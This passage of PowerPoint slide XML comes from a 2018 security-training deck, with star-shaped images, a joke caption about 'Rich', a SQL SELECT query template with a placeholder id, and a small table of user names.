                    <a:pt x="10570" y="18035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13799" y="19800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15573" y="20771"/>
                    <a:pt x="17084" y="21502"/>
                    <a:pt x="17160" y="21425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17237" y="21348"/>
                    <a:pt x="17014" y="19645"/>
                    <a:pt x="16666" y="17643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16033" y="14001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18761" y="11234"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20640" y="9329"/>
                    <a:pt x="21308" y="8402"/>
                    <a:pt x="20904" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20375" y="8085"/>
                    <a:pt x="14795" y="7200"/>
                    <a:pt x="14196" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14060" y="7200"/>
                    <a:pt x="13199" y="5580"/>
                    <a:pt x="12289" y="3600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10640" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="175" name="Image" descr="Image"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:extLst/>
            </a:blip>
            <a:srcRect l="4817" t="4310" r="6540" b="5175"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4748390" y="5772"/>
              <a:ext cx="1198654" cy="1223963"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="5400000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="10800000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="16200000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21017" h="21600" fill="norm" stroke="1" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10640" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8831" y="3600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7837" y="5580"/>
                    <a:pt x="6922" y="7200"/>
                    <a:pt x="6799" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6217" y="7200"/>
                    <a:pt x="628" y="8089"/>
                    <a:pt x="111" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-292" y="8401"/>
                    <a:pt x="393" y="9346"/>
                    <a:pt x="2303" y="11283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5080" y="14099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4593" y="17132"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4327" y="18798"/>
                    <a:pt x="4022" y="20483"/>
                    <a:pt x="3911" y="20879"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3800" y="21275"/>
                    <a:pt x="3807" y="21600"/>
                    <a:pt x="3932" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4056" y="21600"/>
                    <a:pt x="5606" y="20795"/>
                    <a:pt x="7369" y="19814"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10570" y="18035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13799" y="19800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15573" y="20771"/>
                    <a:pt x="17084" y="21502"/>
                    <a:pt x="17160" y="21425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17237" y="21348"/>
                    <a:pt x="17014" y="19645"/>
                    <a:pt x="16666" y="17643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16033" y="14001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18761" y="11234"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20640" y="9329"/>
                    <a:pt x="21308" y="8402"/>
                    <a:pt x="20904" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20375" y="8085"/>
                    <a:pt x="14795" y="7200"/>
                    <a:pt x="14196" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14060" y="7200"/>
                    <a:pt x="13199" y="5580"/>
                    <a:pt x="12289" y="3600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10640" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="176" name="Image" descr="Image"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:extLst/>
            </a:blip>
            <a:srcRect l="4817" t="4310" r="6540" b="5175"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3165596" y="5772"/>
              <a:ext cx="1198655" cy="1223963"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="5400000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="10800000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="16200000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21017" h="21600" fill="norm" stroke="1" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10640" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8831" y="3600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7837" y="5580"/>
                    <a:pt x="6922" y="7200"/>
                    <a:pt x="6799" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6217" y="7200"/>
                    <a:pt x="628" y="8089"/>
                    <a:pt x="111" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-292" y="8401"/>
                    <a:pt x="393" y="9346"/>
                    <a:pt x="2303" y="11283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5080" y="14099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4593" y="17132"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4327" y="18798"/>
                    <a:pt x="4022" y="20483"/>
                    <a:pt x="3911" y="20879"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3800" y="21275"/>
                    <a:pt x="3807" y="21600"/>
                    <a:pt x="3932" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4056" y="21600"/>
                    <a:pt x="5606" y="20795"/>
                    <a:pt x="7369" y="19814"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10570" y="18035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13799" y="19800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15573" y="20771"/>
                    <a:pt x="17084" y="21502"/>
                    <a:pt x="17160" y="21425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17237" y="21348"/>
                    <a:pt x="17014" y="19645"/>
                    <a:pt x="16666" y="17643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16033" y="14001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18761" y="11234"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20640" y="9329"/>
                    <a:pt x="21308" y="8402"/>
                    <a:pt x="20904" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20375" y="8085"/>
                    <a:pt x="14795" y="7200"/>
                    <a:pt x="14196" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14060" y="7200"/>
                    <a:pt x="13199" y="5580"/>
                    <a:pt x="12289" y="3600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10640" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="177" name="Image" descr="Image"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:extLst/>
            </a:blip>
            <a:srcRect l="4817" t="4310" r="6540" b="5175"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1582803" y="5772"/>
              <a:ext cx="1198655" cy="1223963"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="5400000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="10800000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="16200000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21017" h="21600" fill="norm" stroke="1" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10640" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8831" y="3600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7837" y="5580"/>
                    <a:pt x="6922" y="7200"/>
                    <a:pt x="6799" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6217" y="7200"/>
                    <a:pt x="628" y="8089"/>
                    <a:pt x="111" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-292" y="8401"/>
                    <a:pt x="393" y="9346"/>
                    <a:pt x="2303" y="11283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5080" y="14099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4593" y="17132"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4327" y="18798"/>
                    <a:pt x="4022" y="20483"/>
                    <a:pt x="3911" y="20879"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3800" y="21275"/>
                    <a:pt x="3807" y="21600"/>
                    <a:pt x="3932" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4056" y="21600"/>
                    <a:pt x="5606" y="20795"/>
                    <a:pt x="7369" y="19814"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10570" y="18035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13799" y="19800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15573" y="20771"/>
                    <a:pt x="17084" y="21502"/>
                    <a:pt x="17160" y="21425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17237" y="21348"/>
                    <a:pt x="17014" y="19645"/>
                    <a:pt x="16666" y="17643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16033" y="14001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18761" y="11234"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20640" y="9329"/>
                    <a:pt x="21308" y="8402"/>
                    <a:pt x="20904" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20375" y="8085"/>
                    <a:pt x="14795" y="7200"/>
                    <a:pt x="14196" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14060" y="7200"/>
                    <a:pt x="13199" y="5580"/>
                    <a:pt x="12289" y="3600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10640" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="178" name="Image" descr="Image"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:extLst/>
            </a:blip>
            <a:srcRect l="4817" t="4310" r="6540" b="5175"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10" y="0"/>
              <a:ext cx="1198654" cy="1223963"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="5400000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="10800000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="16200000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21017" h="21600" fill="norm" stroke="1" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10640" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8831" y="3600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7837" y="5580"/>
                    <a:pt x="6922" y="7200"/>
                    <a:pt x="6799" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6217" y="7200"/>
                    <a:pt x="628" y="8089"/>
                    <a:pt x="111" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-292" y="8401"/>
                    <a:pt x="393" y="9346"/>
                    <a:pt x="2303" y="11283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5080" y="14099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4593" y="17132"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4327" y="18798"/>
                    <a:pt x="4022" y="20483"/>
                    <a:pt x="3911" y="20879"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3800" y="21275"/>
                    <a:pt x="3807" y="21600"/>
                    <a:pt x="3932" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4056" y="21600"/>
                    <a:pt x="5606" y="20795"/>
                    <a:pt x="7369" y="19814"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10570" y="18035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13799" y="19800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15573" y="20771"/>
                    <a:pt x="17084" y="21502"/>
                    <a:pt x="17160" y="21425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17237" y="21348"/>
                    <a:pt x="17014" y="19645"/>
                    <a:pt x="16666" y="17643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16033" y="14001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18761" y="11234"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20640" y="9329"/>
                    <a:pt x="21308" y="8402"/>
                    <a:pt x="20904" y="8265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20375" y="8085"/>
                    <a:pt x="14795" y="7200"/>
                    <a:pt x="14196" y="7200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14060" y="7200"/>
                    <a:pt x="13199" y="5580"/>
                    <a:pt x="12289" y="3600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10640" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Still Rich’s boss. But Rich almost definitely won’t have a job after this."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8240700" y="11842455"/>
            <a:ext cx="7902600"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i="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Still Rich’s boss. But Rich almost definitely won’t have a job after this.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0"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55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552" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-94855" y="1325990"/>
            <a:ext cx="24573709" cy="4100585"/>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555" name="SELECT first_name, last_name…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6367797" y="1730045"/>
            <a:ext cx="9441161" cy="329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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> first_name, last_name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  u.id=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="17374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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="557" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1056078" y="6679517"/>
          <a:ext cx="22271843" cy="5758319"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="1" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11132125"/>
                <a:gridCol w="11139717"/>
              </a:tblGrid>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>first_name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>last_name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Rich</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Adams</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="822616">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Arup</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Chakrabarti</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
